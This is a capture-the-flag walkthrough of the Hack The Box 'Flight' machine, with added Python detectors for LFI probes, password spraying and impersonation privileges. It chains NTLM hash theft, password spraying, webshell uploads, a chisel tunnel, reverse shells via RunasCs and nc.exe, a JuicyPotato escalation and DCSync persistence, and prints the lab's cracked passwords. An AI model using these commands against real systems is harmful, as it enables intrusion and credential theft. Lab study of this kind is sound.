HTB Flight

Damaidec
May 6, 2023


The machine is about stealing NTLM hashes, first via LFI and afterwards via SMB. There are also some common AD misconfigurations such as password reuse. After you get the user flag you will need to enumerate further and do user impersonation via runas, which is a bit of a challenge since there is no RDP, WinRM or interactive shell to use. After you gain a shell as C.bum you will have write access to inetpub, which we can use to drop a shell file. Lastly, the privesc is SeImpersonatePrivilege, which you can use with JuicyPotato to elevate to administrator.

Running nmap shows 12 open ports, including 88, 3268 and 53, which strongly indicates that the machine is a domain controller.

all ports

Checking the web, there is nothing interesting here. Earlier, nmap showed flight.htb, which we can add to /etc/hosts.

Doing some subdomain enumeration we get school.

Checking the page, it has a ?view parameter, which suggests it could be an LFI.

Fuzzing for Windows LFI was a success, but trying to find some interesting files didn't lead to anything.

Since this is a domain controller we can steal some hashes via the LFI. This also works for SQLi and XXE:

https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
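From the defender's side, the include parameter above is exactly what you want to watch in the web server logs: a `view` value that walks up with `../`, names an absolute Windows path, or points at a UNC path (`\\host\share`, which makes the server authenticate outbound over SMB and is where the NTLMv2 hash leaks). The scanner below is an added example, not code from the write-up; the access log lines are constructed (the source addresses and the `C:\xampp\htdocs\school.flight.htb` path are sample values), and only the parameter name `view` comes from the page.

```python
"""Flag LFI probes in Apache/IIS-style access logs: directory traversal,
absolute Windows paths and UNC paths handed to an include parameter.
Added illustration; the log lines are constructed sample data."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote

# Combined-log-format request line: source address first, then "METHOD target HTTP/x.y".
REQUEST = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"\.\.[\\/]")            # ../ or ..\
ABS_WIN = re.compile(r"^[A-Za-z]:[\\/]")        # C:\ or C:/
UNC_PATH = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")  # \\host\share or //host/share

# Constructed sample log (not real traffic). Line 4 is the hash-theft pattern the
# write-up describes: an include of a UNC path on the attacker's box.
SAMPLE_LOG = r"""
10.10.14.5 - - [06/May/2023:10:01:02 +0000] "GET /index.php?view=home.html HTTP/1.1" 200 512
10.10.14.5 - - [06/May/2023:10:01:09 +0000] "GET /index.php?view=../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.5 - - [06/May/2023:10:01:15 +0000] "GET /index.php?view=C:\xampp\htdocs\school.flight.htb\index.php HTTP/1.1" 200 1024
10.10.14.5 - - [06/May/2023:10:01:21 +0000] "GET /index.php?view=\\10.10.14.5\share\x HTTP/1.1" 200 0
10.10.14.5 - - [06/May/2023:10:01:30 +0000] "GET /index.php?view=%2e%2e%2f%2e%2e%2fwindows%2fwin.ini HTTP/1.1" 200 92
10.10.20.7 - - [06/May/2023:10:02:00 +0000] "GET /index.php?view=about.html HTTP/1.1" 200 640
""".strip()


def classify(value):
    """Return the kind of suspicious include value, or None when it looks benign."""
    v = unquote(value)  # parse_qs decoded once already; decode again to catch double encoding
    if UNC_PATH.match(v):
        return "unc-path"       # forces an outbound SMB authentication from the server
    if ABS_WIN.match(v):
        return "absolute-path"  # reads arbitrary files on the host
    if TRAVERSAL.search(v):
        return "traversal"
    return None


def scan_log(text, param="view"):
    """Walk the log and collect every suspicious value passed to `param`."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            kind = classify(value)
            if kind:
                hits.append({"src": m.group("src"), "kind": kind, "value": value})
    return hits


def summarize(hits):
    """Count suspicious requests per source address."""
    return dict(Counter(h["src"] for h in hits))


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["src"]:12} {h["kind"]:14} {h["value"]}')
    print(summarize(scan_log(SAMPLE_LOG)))
```

The mitigations this points at are the usual ones: validate `view` against an allowlist of page names rather than building a file path from it, and block outbound 445/139 from web servers and domain controllers so a coerced include cannot deliver a hash even when the LFI exists.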

After we get the hash, let's use hashcat -m 5600 hash rockyou.txt to crack the NTLMv2.

Password cracked: S@Ss!K@*t13

Trying WinRM/RDP doesn't work, same with psexec and wmiexec.

Running smbmap shows read-only permissions on the folders.

Since this is a DC, I will check things in BloodHound to get a better understanding of how we could get to domain admin.

Checking for DCSync rights, only the DC and the admin have them.

While checking the domain users' outbound object control I found this user I.francis. I don't actually know why I added it here; it just made me laugh when I read the description.

I.francis

After checking for a while, nothing interesting from outbound object control or from any of the groups. The only interesting part here is the webdevs group, which has only 1 user, although from reading the description there are 2 potential users, 1 junior webdev and 1 senior webdev. Aside from that, if we get this user/group we could probably have write permission to the web folder and use it to get a shell.

Another interesting user is L.kein, which has a description of pentester. There might be some juicy stuff or remnants of payloads we could use to escalate privileges.

The next thing to consider is Kerberoasting to get some hashes.

We could use impacket or kerbrute here, but after doing that, no luck. In BloodHound there is no output for Find AS-REP Roastable Users (DontReqPreAuth), and the only kerberoastable account is krbtgt.

We can use rpcclient and then enumdomusers to create a user list.

Next is to run crackmapexec to check for reused passwords, and we get a new user, S.moon:

crackmapexec smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
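What that spray looks like on the DC is one source address producing a failed logon (event 4625) for many different accounts within a few seconds, followed by a success (4624) for the one account that reuses the password. The detector below is an added example, not code from the write-up: the event records are constructed in that shape (timestamp, event id, account, source), the account names are the ones the page mentions, and the source addresses and thresholds are sample values.

```python
"""Detect a password spray from Windows logon events: many distinct accounts
failing from one source inside a short window, and report which accounts
succeeded from that source in the same window.  Added illustration; the
events are constructed sample data, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625
SUCCESS_LOGON = 4624

# Constructed records: (timestamp, event id, account name, source address).
EVENTS = [
    ("2023-05-06T10:00:01", FAILED_LOGON, "Administrator", "10.10.14.5"),
    ("2023-05-06T10:00:01", FAILED_LOGON, "C.bum", "10.10.14.5"),
    ("2023-05-06T10:00:02", FAILED_LOGON, "I.francis", "10.10.14.5"),
    ("2023-05-06T10:00:02", FAILED_LOGON, "L.kein", "10.10.14.5"),
    ("2023-05-06T10:00:03", FAILED_LOGON, "krbtgt", "10.10.14.5"),
    ("2023-05-06T10:00:03", SUCCESS_LOGON, "S.moon", "10.10.14.5"),   # the reused password
    ("2023-05-06T10:00:04", FAILED_LOGON, "svc_apache", "10.10.14.5"),
    ("2023-05-06T09:30:00", FAILED_LOGON, "C.bum", "10.10.20.7"),     # a lone typo, not a spray
    ("2023-05-06T09:31:00", SUCCESS_LOGON, "C.bum", "10.10.20.7"),
]


def detect_spray(events, window_minutes=5, min_failed_users=5):
    """Return one alert per source whose failures cover at least
    `min_failed_users` distinct accounts within any `window_minutes` window."""
    by_src = defaultdict(list)
    for ts, event_id, account, src in events:
        by_src[src].append((datetime.fromisoformat(ts), event_id, account.lower()))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for src, rows in by_src.items():
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):
            # Slide the window forward from each event in turn.
            in_window = [r for r in rows[i:] if r[0] - t0 <= window]
            failed = {a for _, e, a in in_window if e == FAILED_LOGON}
            if len(failed) >= min_failed_users:
                succeeded = sorted({a for _, e, a in in_window if e == SUCCESS_LOGON})
                alerts.append({
                    "source": src,
                    "start": t0.isoformat(),
                    "failed_accounts": len(failed),
                    "succeeded": succeeded,   # accounts that share the sprayed password
                })
                break   # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

On a real domain controller the same logic applies to 4776 (NTLM validation failures) and 4771 (Kerberos pre-authentication failures), which is where crackmapexec's SMB logons land; the key signal is the count of distinct accounts per source, not the count of failures per account, which is why spraying slips past per-account lockout thresholds.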

Running smbmap shows write permission on Shared. One attack we could do here is an SCF file attack to steal hashes.

There are many ways to upload a file to SMB; we could use:

sudo mount -t cifs '//flight.htb/Shared' -o username=S.moon /tmp/1/testmnt

smbmap -H flight.htb -u S.moon -p 'S@Ss!K@*t13' --upload test.txt Shared\\testhello

smbclient, and then put <filename>


Observing it for a while shows that the file is being removed, which strongly indicates that we could abuse this to steal an NTLM hash.

Trying to upload an SCF doesn't work, and I realized it is because of the extension: uploading files with a .scf extension to the share doesn't work; it only accepts certain extensions.

https://nored0x.github.io/red-teaming/smb-share-scf-file-attacks/

Trying to upload various file extensions, .ini works.

Checking HackTricks, a .ini file can be used to steal NTLMv2 (https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds), and after that we crack the hash again.

Again RDP and WinRM don't work, same with psexec and wmiexec.

Alternatively we can use smbclient '\\flight.htb\Users' -U 'C.bum%Tikkycoll_431012284', then go to Desktop and get our user flag.

Checking for read/write, we have write permission on the Web folder.

Let's upload a PHP webshell to one of the folders. If we look, it has index.php listed, so a PHP webshell will work:

smbmap -H flight.htb -u C.bum -p 'Tikkycoll_431012284' --upload cmd.php Web\\school.flight.htb\\cmd.php

Next is to access the webshell, and it seems we are svc_apache. Checking for privileges, we don't have anything useful to escalate with.

The next thing I tried was uploading an msfvenom payload to get a Meterpreter session; we will use this to run exploit_suggester.

After trying exploit suggester, none of it works. I also tried some runas modules, but nothing works.

Next is to look for open ports, and we can see that port 8000 is open, which is interesting since it didn't show in our nmap. Despite it listening on 0.0.0.0, that's odd; it might be a firewall or something.

The next thing to do is port forward port 8000 with chisel:

On the target machine: .\chisel.exe client <attackerip>:<port> R:8000:127.0.0.1:8000

On the attacker machine: ./chisel server --reverse -p 9999

To check if it's successful you can grep for ports 9999 and 8000, or access port 8000.

Checking the website, it shows something simple, but there is no functionality in it.

After enumerating where the landing page is, we find it in inetpub\development. After that I check for write permission, and we don't have it.

The next idea was to do user impersonation to C.bum since he is a senior webdev. We will do this via runas, but after trying and looking around for how to do this in one line, it seems this won't work, and we need an interactive shell to perform a runas. Some ideas I could think of are to create a script or exe file that uses the runas command and use nc.exe to give us a shell, or just find some tools online.

After looking around we found https://github.com/antonioCoco/RunasCs

and trying the whoami command works.

Checking for privileges, it seems we can't use this user to privesc.

Checking the GitHub, we can get a shell with .\RunasCs.exe C.bum Tikkycoll_431012284 cmd.exe -r <ip>:<port>

Checking for write permission was a success, and checking our port-forwarded port, it also reflects on the web.

Since it is in inetpub, this is ASP.NET/IIS stuff, so we can go to SecLists and look for an ASPX webshell.

Checking what user we are and our privileges, we are IIS, and we also have SeImpersonatePrivilege, which we can use to escalate our privileges.

One of the reasons I always check whoami /priv is that some services or service users require SeImpersonatePrivilege to perform administrative-level tasks such as configuring the system, and some of them have it by default upon installation of a program or application.

For example, if we install GLPI and get a reverse shell, there's a chance we get a shell as nt auth\network service.

For an MSSQL server application, the shell we can get is nt auth\mssql, which has a high chance of having SeImpersonatePrivilege.

https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/executing-commands
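The habit of reading whoami /priv applies just as well when auditing the service accounts you run: the question is whether SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is present in the token at all, because a "Disabled" state only means it is not currently enabled and a process holding the token can enable it. The small parser below is an added example, not code from the write-up; the whoami /priv output it reads is constructed in the shape that command prints for a service account, and is not output captured from the box.

```python
"""Parse `whoami /priv` output and flag token-impersonation privileges.
Added illustration; the sample output is constructed, not captured."""

# Privileges that let a process act with another caller's token. Their mere presence
# in the token matters; "Disabled" is not a safeguard.
TOKEN_ABUSE_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
}

# Constructed sample in the format `whoami /priv` prints (columns separated by spaces,
# header underlined with '=' characters). State is the last column.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege name: state} for every row after the '====' header line."""
    privs = {}
    past_header = False
    for line in text.splitlines():
        if line.startswith("====="):
            past_header = True
            continue
        if not past_header or not line.strip():
            continue
        parts = line.split()
        privs[parts[0]] = parts[-1]   # first column is the name, last is Enabled/Disabled
    return privs


def risky_privileges(privs):
    """Names of present impersonation privileges, regardless of Enabled/Disabled."""
    return sorted(name for name in privs if name in TOKEN_ABUSE_PRIVS)


def report(text):
    """Human-readable audit lines for the privileges that matter."""
    privs = parse_whoami_priv(text)
    return [f"{name} ({privs[name]}): {TOKEN_ABUSE_PRIVS[name]}" for name in risky_privileges(privs)]


if __name__ == "__main__":
    for line in report(SAMPLE_WHOAMI_PRIV):
        print(line)
```

The defensive takeaway matches the write-up's point: IIS application pool identities, the network service account and database service accounts carry these privileges by default, so a web shell or command execution as one of them is one step from SYSTEM on an unpatched host. Keeping such services patched, running them under dedicated least-privilege accounts where the product allows it, and alerting on child processes spawned by w3wp.exe or the database service are the controls that matter here.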

The next thing to do is escalate privileges. We can upload JuicyPotato and nc.exe, or get a Meterpreter session and use getsystem (the easiest way).

Next is to set up a listener and execute .\juicypotatong.exe -t * -p "C:\windows\System32\cmd.exe" -a "/c c:\xampp\htdocs\school.flight.htb\nc.exe <ip> <port> -e cmd"

After executing JuicyPotato we receive a shell as nt authority, and we can now get the admin flag.

One last thing to do is to perform a DCSync. I know this is not needed on this box, but it's always good to have persistence on the machine, and we can use pass-the-hash here to always authenticate as the administrator.

If you are going to do the OFFSHORE Pro Lab, keeping this in mind will help you finish the lab and set up your lateral movement easily.
